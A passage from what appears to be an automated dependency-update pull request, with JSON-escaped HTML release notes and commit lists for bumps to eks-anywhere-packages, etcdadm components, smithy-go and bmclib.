href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/s3/v1.57.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.24.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/b860661df961e236ca154f5a66e1f01216639738\"\u003e\u003ccode\u003eb860661\u003c/code\u003e\u003c/a\u003e Release 2026-02-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/567846b9a9de2906faffe420719177aece913452\"\u003e\u003ccode\u003e567846b\u003c/code\u003e\u003c/a\u003e Bump minimun Go version to 1.24 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/629\"\u003e#629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/8c6355875a5c602fa6c2d9093e2b46e69e4d38f4\"\u003e\u003ccode\u003e8c63558\u003c/code\u003e\u003c/a\u003e Release 2026-02-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c6d1144762205b31f9d511b1525eb67b0c4c1e4c\"\u003e\u003ccode\u003ec6d1144\u003c/code\u003e\u003c/a\u003e Create new event stream generator (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/626\"\u003e#626\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f82babd3fee1cc95f6974716ba570c1d4f72e8a1\"\u003e\u003ccode\u003ef82babd\u003c/code\u003e\u003c/a\u003e update Smithy version to 1.67.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/627\"\u003e#627\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/708bee3fd23f247fe0b019ae3fbb9dd7837117bc\"\u003e\u003ccode\u003e708bee3\u003c/code\u003e\u003c/a\u003e move writable and chainwritable up (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/622\"\u003e#622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/7bfe108d0fa9790e554d201e80faa6b8051569d0\"\u003e\u003ccode\u003e7bfe108\u003c/code\u003e\u003c/a\u003e Add support for OrExpression JMESPath (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/9dbc5b22fed45a861a3782db7642bec232c5b0b3\"\u003e\u003ccode\u003e9dbc5b2\u003c/code\u003e\u003c/a\u003e bump smithy to v1.64.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/71f5bff362491399f8a2cca586c5802eb5a66d70\"\u003e\u003ccode\u003e71f5bff\u003c/code\u003e\u003c/a\u003e Release 2025-12-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c94c177cfcf46095d48a88253899242f5971ae1b\"\u003e\u003ccode\u003ec94c177\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.24.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare 